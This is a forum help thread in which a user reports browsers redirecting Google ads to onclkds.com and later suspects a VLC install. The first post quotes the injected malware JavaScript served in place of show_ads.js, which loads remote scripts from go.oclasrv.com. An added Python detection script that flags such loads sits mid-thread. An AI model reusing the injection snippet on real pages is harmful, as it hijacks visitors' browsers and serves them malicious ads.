
Browser redirecting google ads to onclkds.com



#1 fabioz

Posted 09 July 2017 - 07:45 AM

Hi, I've just gotten some nasty redirect to onclkds.com.

 

The symptom is that all the browsers on my machine are redirecting google ads to onclkds.com when the page requested is not over an https connection.

 

I dug a bit more and discovered that the virus is actually making any request to:

 

http://pagead2.googlesyndication.com/pagead/show_ads.js

 

return the following JavaScript:

 

if (typeof js_71192 === 'undefined') { var js_71192 = document.createElement('script'); js_71192.type='text/javascript'; ; js_71192.src='http://go.oclasrv.com/apu.php?zoneid=877371'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(js_71192);}};function f_80091(){ if (typeof js_80207 === 'undefined') { var js_80207 = document.createElement('script'); js_80207.type='text/javascript'; ; js_80207.src='http://pagead2.googlesyndication.com/r.php'; var dns_qc_head = document.getElementsByTagName('head')[0]; if (dns_qc_head) { dns_qc_head.appendChild(js_80207);}}; }; setTimeout(f_80091,120000);

 

and http://go.oclasrv.com actually redirects to onclkds.com

 

(so, it's easy to see that I'm infected)

 

As a current workaround I've turned on the adblockers and it doesn't appear anymore, but I know the virus is out there serving me onclkds.com in the place of google ads.

 

As a note, I tried it without a browser too -- using python:

 

>>> import requests
 
and it showed me the same malware JavaScript -- also, the browsers don't have any extension installed (i.e.: definitely something happening at the system level).

 

I've tried avast, hitman pro (portable), rogue killer (portable) and they didn't find anything. Any tips on how to get rid of that?
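A defender-side check for the symptom described in the post above, as an added example that is not part of the original post: it scans a response body for script elements created at run time and reports the ones loaded from a host other than the one requested, or over cleartext http. The function names are hypothetical, and the sample body is the payload quoted in the post, embedded so the check runs offline.

```python
import re
from urllib.parse import urlsplit

# Response body as quoted in the post above (returned for show_ads.js over http).
SAMPLE_BODY = (
    "if (typeof js_71192 === 'undefined') { var js_71192 = document.createElement('script'); "
    "js_71192.type='text/javascript'; ; js_71192.src='http://go.oclasrv.com/apu.php?zoneid=877371'; "
    "var dns_qc_head = document.getElementsByTagName('head')[0]; "
    "if (dns_qc_head) { dns_qc_head.appendChild(js_71192);}};"
    "function f_80091(){ if (typeof js_80207 === 'undefined') { "
    "var js_80207 = document.createElement('script'); js_80207.type='text/javascript'; ; "
    "js_80207.src='http://pagead2.googlesyndication.com/r.php'; "
    "var dns_qc_head = document.getElementsByTagName('head')[0]; "
    "if (dns_qc_head) { dns_qc_head.appendChild(js_80207);}}; }; setTimeout(f_80091,120000);"
)

# Matches "<name> = document.createElement('script')" and captures <name>.
CREATE_RE = re.compile(r"(\w+)\s*=\s*document\.createElement\(\s*['\"]script['\"]\s*\)")


def dynamic_script_urls(js_body):
    """Return the URLs assigned to .src of script elements the body creates at run time."""
    urls = []
    for var in dict.fromkeys(CREATE_RE.findall(js_body)):  # de-duplicate, keep order
        src_re = re.compile(re.escape(var) + r"\.src\s*=\s*['\"]([^'\"]+)['\"]")
        urls.extend(src_re.findall(js_body))
    return urls


def audit_body(js_body, expected_host):
    """Return (url, reasons) for each dynamic script load that deserves a second look."""
    findings = []
    for url in dynamic_script_urls(js_body):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        reasons = []
        # Relative URLs have no host and stay on the requested origin.
        if host and host != expected_host and not host.endswith("." + expected_host):
            reasons.append("third-party host")
        if parts.scheme == "http":
            reasons.append("cleartext load")
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in audit_body(SAMPLE_BODY, "pagead2.googlesyndication.com"):
        print(url, "->", ", ".join(reasons))
```
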





#2 fabioz


Posted 09 July 2017 - 09:04 AM

Humm, apparently it was something on my VLC install.

 

I checked my install history and it was the latest program I had installed. I removed it and apparently the redirect no longer takes place.

 

Although I also did other things (created restore point, created FRST, used avast, hitman pro (portable), rogue killer (portable), adwcleaner), they all said they didn't find anything, so VLC still seems the most likely in my case (although it only disappeared after uninstalling it and restarting the computer). The VLC install seems to have a VideoLAN signature, so I find this a bit hard to grok, as it's definitely not software where I'd expect to find anything, so, who knows, it may be something which had infected it and is still lurking around or has a delayed initialization or more random behavior...

 

Anyways, I currently don't have the redirect anymore. I took a look myself at the logs generated by FRST and didn't find anything suspicious. If something happens again I'll report back.





